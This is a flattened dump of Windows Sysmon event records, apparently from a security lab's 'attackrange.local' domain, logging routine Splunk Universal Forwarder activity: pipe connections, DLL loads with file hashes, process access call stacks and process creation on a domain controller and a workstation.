18141800x800000000000000057344229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:15:10.464{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 11241100x800000000000000057344223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.264{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057344222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.264{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4CED18287D309809C08CAB51D91952D,SHA256=EB39B80617DD049537F8EFF9C3350235EF72644BB3189E07FBBA254861C08BF7falsetrue 10341000x800000000000000021219256Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACE-618E-FECD-08000000F101}1648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219255Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219254Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219253Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219252Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219251Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-5432-6143-0500-00000000F101}412980C:\Windows\system32\csrss.exe{AD5E2759-5ACE-618E-FECD-08000000F101}1648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219250Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.299{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACE-618E-FECD-08000000F101}1648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219249Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:10.279{AD5E2759-5ACE-618E-FECD-08000000F101}1648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 534500x800000000000000057344221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.010{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.010{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 10341000x800000000000000057344219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:10.010{8B6011A9-5ACD-618E-34F3-04000000F101}53727892C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344218Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.994{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344217Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:09.994{8B6011A9-5ACD-618E-34F3-04000000F101}5372C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219277Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5ACF-618E-00CE-08000000F101}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219276Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219275Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219274Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219273Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219272Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-5432-6143-0500-00000000F101}412528C:\Windows\system32\csrss.exe{AD5E2759-5ACF-618E-00CE-08000000F101}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219271Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.669{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5ACF-618E-00CE-08000000F101}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219270Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.654{AD5E2759-5ACF-618E-00CE-08000000F101}4924C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000021219269Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:15:11.403{AD5E2759-54D4-6143-DD00-00000000F101}1092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E31FFDE127DD127AC32CD4A9D99116CA,SHA256=4C63F33A40D4E6C4090C5B70F4484542573694827A1BF04C019158BA7B60EAD4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000057344394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.910{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.910{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.910{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057344390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe 734700x800000000000000057344388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:15:11.895{8B6011A9-5ACF-618E-37F3-04000000F101}9584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 